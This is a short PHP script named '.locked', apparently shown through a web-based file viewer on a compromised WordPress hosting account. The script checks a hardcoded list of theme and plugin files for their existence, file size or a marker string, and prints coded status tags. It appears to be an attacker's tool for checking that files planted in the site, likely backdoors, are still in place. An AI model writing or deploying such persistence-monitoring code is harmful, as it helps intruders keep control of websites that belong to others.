View file File name : .locked Content :<?php $r = '/home/provobis/other_sites/portretdevoluntar'; $x = ["/wp-content/themes/twentyfifteen/inc/customizer.php"=>"bd@@14472830@@X-Dns-Prefetch-Control", "/wp-content/themes/dorayaki/header.php"=>"bd@@2246021@@5268", "/wp-content/plugins/backup-backup/includes/banner/views/projects/red/xmb.inc.php"=>"ui@@3354@@1435"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');